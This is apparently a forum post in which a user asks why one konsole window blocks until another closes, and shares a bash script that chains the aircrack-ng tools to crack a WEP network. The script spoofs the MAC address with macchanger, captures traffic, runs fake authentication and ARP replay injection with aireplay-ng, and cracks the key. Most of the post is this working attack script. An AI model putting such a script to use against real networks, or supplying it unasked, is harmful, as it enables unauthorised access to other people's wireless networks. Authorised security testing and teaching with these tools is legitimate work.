I wanted to make a bash script that would just basically run all of the wep cracking commands for me. The problem I'm having is that whenever I open a new konsole, the current one waits until that one closes, how to I avoid that?
This is what I have so far:
Code:#!/bin/bash clear echo Enter the interface: read INTERFACE echo Enter the essid: read ESSID echo Enter the bssid: read BSSID echo Enter the channel: read CH echo Enter a file: read FILE echo Enter the mac: read MAC clear airmon-ng stop $INTERFACE ifconfig $INTERFACE down macchanger --mac $MAC $INTERFACE airmon-ng start $INTERFACE konsole -e airodump-ng -c $CH -w $FILE --bssid $BSSID $INTERFACE konsole --noclose -e aircrack-ng -b $BSSID $FILE+*.cap aireplay-ng -1 0 -a $BSSID -h $MAC -e $ESSID $INTERFACE aireplay-ng -3 -a $BSSID -h $MAC $INTERFACE


